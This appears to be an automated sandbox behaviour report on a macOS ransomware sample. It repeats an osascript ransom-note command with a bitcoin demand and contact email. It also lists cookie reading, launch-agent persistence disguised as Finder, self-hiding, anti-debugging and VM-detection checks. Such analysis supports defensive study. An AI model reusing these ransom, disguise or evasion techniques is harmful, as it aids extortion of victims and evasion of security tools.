Source: /bin/sh (PID: 799)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 802)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 805)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 808)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 811)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 814)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 817)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 820)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 823)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 826)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 829)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 832)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 835)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 838)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 841)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 844)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 847)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 850)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 853)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 856)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 859)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 862)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 865)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Reads local browser cookiesShow sources
Source: /var/root/Library/.FS_Store (PID: 718)Binary cookie file read: /private/var/root/Library/Cookies/Cookies.binarycookies
Source: /var/root/Library/.FS_Store (PID: 718)Binary cookie file read: /private/var/root/Library/Cookies/Cookies.binarycookies
Terminates several processes with shell command 'killall'Show sources
Source: /bin/sh (PID: 732)Killall command executed: killall Finder

Boot Survival:

barindex
Creates memory-persistent launch servicesShow sources
Source: /Users/vreni/Desktop/macRansom (PID: 686)Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /var/root/Library/LaunchAgents/com.apple.finder.plist
Creates user-wide 'launchd' managed services aka launch agentsShow sources
Source: /Users/vreni/Desktop/macRansom (PID: 686)Launch agent created file created: /var/root/Library/LaunchAgents/com.apple.finder.plist

Hooking and other Techniques for Hiding and Protection:

barindex
Creates 'launchd' managed services aka launch agents with bundle ID names to possibly disguise malicious intentionsShow sources
Source: /Users/vreni/Desktop/macRansom (PID: 686)Launch agent created file created: /var/root/Library/LaunchAgents/com.apple.finder.plist
Creates hidden files and/or links with names to possibly disguise malicious intentionsShow sources
Source: /bin/mv (PID: 697)Hidden file moved: /Users/vreni/Desktop/macRansom -> /var/root/Library/.FS_Store
Creates hidden Mach-O filesShow sources
Source: /bin/mv (PID: 697)Submitted Mach-O file moved to hidden file: /Users/vreni/Desktop/macRansom -> /var/root/Library/.FS_Store
Denies being traced/debugged (via ptrace PT_DENY_ATTACH)Show sources
Source: /Users/vreni/Desktop/macRansom (PID: 686)PTRACE system call (PT_DENY_ATTACH): PID 686 denies future traces
Source: /var/root/Library/.FS_Store (PID: 704)PTRACE system call (PT_DENY_ATTACH): PID 704 denies future traces
Source: /var/root/Library/.FS_Store (PID: 718)PTRACE system call (PT_DENY_ATTACH): PID 718 denies future traces
Moves itself during installation or deletes itself after installationShow sources
Source: /bin/mv (PID: 697)File moved: /Users/vreni/Desktop/macRansom -> /var/root/Library/.FS_Store

Malware Analysis System Evasion:

barindex
Reads the sysctl hardware model value (may be used for detecting VM presence)Show sources
Source: /usr/sbin/sysctl (PID: 688)Sysctl read request: hw.model (6.2)
Source: /usr/sbin/sysctl (PID: 706)Sysctl read request: hw.model (6.2)
Source: /usr/sbin/sysctl (PID: 720)Sysctl read request: hw.model (6.2)
Reads the sysctl number of physical and/or logical CPUs value (may be used for detecting VM presence)Show sources
Source: /usr/sbin/sysctl (PID: 694)Sysctl read request: hw.logicalcpu (6.104)
Source: /usr/sbin/sysctl (PID: 696)Sysctl read request: hw.physicalcpu (6.102)
Source: /usr/sbin/sysctl (PID: 712)Sysctl read request: hw.logicalcpu (6.104)
Source: /usr/sbin/sysctl (PID: 714)Sysctl read request: hw.physicalcpu (6.102)
Source: /usr/sbin/sysctl (PID: 726)Sysctl read request: hw.logicalcpu (6.104)
Source: /usr/sbin/sysctl (PID: 728)Sysctl read request: hw.physicalcpu (6.102)

Language, Device and Operating System Detection:

barindex
Reads the system or server version plist fileShow sources
Source: /usr/bin/osascript (PID: 736)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 740)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 743)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 747)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 750)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 753)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 756)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 759)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 762)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 765)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 768)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 771)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 774)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 777)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 780)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 784)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 787)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 790)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 793)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 796)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 799)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 802)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 805)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 808)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 811)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 814)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 817)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 820)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 823)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 826)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 829)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 832)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 835)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 838)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 841)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 844)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 847)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 850)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 853)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 856)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 859)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 862)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 865)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Reads the systems hostnameShow sources
Source: /bin/sh (PID: 687)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 690)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 697)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 698)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 699)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 700)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 701)Sysctl requested: kern.hostname (1.10)
Source: /bin/bash (PID: 702)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 705)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 708)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 715)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 719)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 722)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 730)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 731)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 732)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 735)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 736)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 739)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 740)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 742)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 743)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 746)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 747)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 749)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 750)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 752)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 753)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 755)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 756)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 758)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 759)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 761)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 762)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 764)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 765)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 767)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 768)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 770)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 771)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 773)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 774)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 776)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 777)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 779)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 780)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 783)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 784)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 786)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 787)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 789)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 790)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 792)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 793)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 795)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 796)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 798)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 799)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 801)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 802)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 804)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 805)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 807)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 808)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 810)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 811)Sysctl requested: kern.hostname (1.10)
